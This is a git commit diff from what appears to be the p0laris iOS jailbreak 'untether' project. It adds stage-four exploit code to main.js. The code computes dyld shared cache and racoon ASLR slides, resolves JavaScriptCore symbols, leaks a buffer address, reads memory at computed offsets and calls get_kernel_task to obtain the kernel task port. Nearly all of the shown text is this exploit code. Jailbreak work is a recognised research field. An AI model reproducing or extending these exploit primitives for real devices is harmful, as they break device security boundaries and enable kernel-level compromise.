diff options
| author | spv420 <spv@spv.sh> | 2022-07-31 17:59:28 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 17:59:28 -0400 |
| commit | adc93da5f2940ba1429e392ee9b1804b541e14f6 (patch) | |
| tree | 324a60d72e481f632734adf022b1db01207f8b4f /src/stage4/main.js | |
| parent | d1bfa6b5c947431ecf331c1222f47196b1834850 (diff) | |
| parent | b88cb06e11df31cb7f079d2c78c42b7fced7bb17 (diff) | |
Merge branch 'master' of https://github.com/p0larisdev/untether
Diffstat (limited to 'src/stage4/main.js')
| -rw-r--r-- | src/stage4/main.js | 24 |
1 files changed, 22 insertions, 2 deletions
diff --git a/src/stage4/main.js b/src/stage4/main.js index 959f4b5..af2ed69 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -12,13 +12,33 @@ var SOCK_DGRAM = 2; var SOCK_DGRAM = 2; var IPPROTO_UDP = 17; +function prep_shit() { + string_ref = scall("JSStringCreateWithUTF8CString", "victim"); + global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44)); + jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL); + large_buf_ptr = leak_vec(large_buf); +} + function main() { syslog(LOG_SYSLOG, "__p0laris_LOG_START__"); p0laris_log("[*] we out here"); p0laris_log("[*] landed in stage4"); - printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide); - printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide); + p0laris_log("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide); + p0laris_log("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide); + +// printf = p0laris_log; + + printf("test"); + + var dyld_shc_slide = get_dyld_shc_slide(); + + sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide; + sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide; + sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; + prep_shit(); + + var tfp0 = get_kernel_task(); syslog(LOG_SYSLOG, "__p0laris_LOG_END__"); return 0; |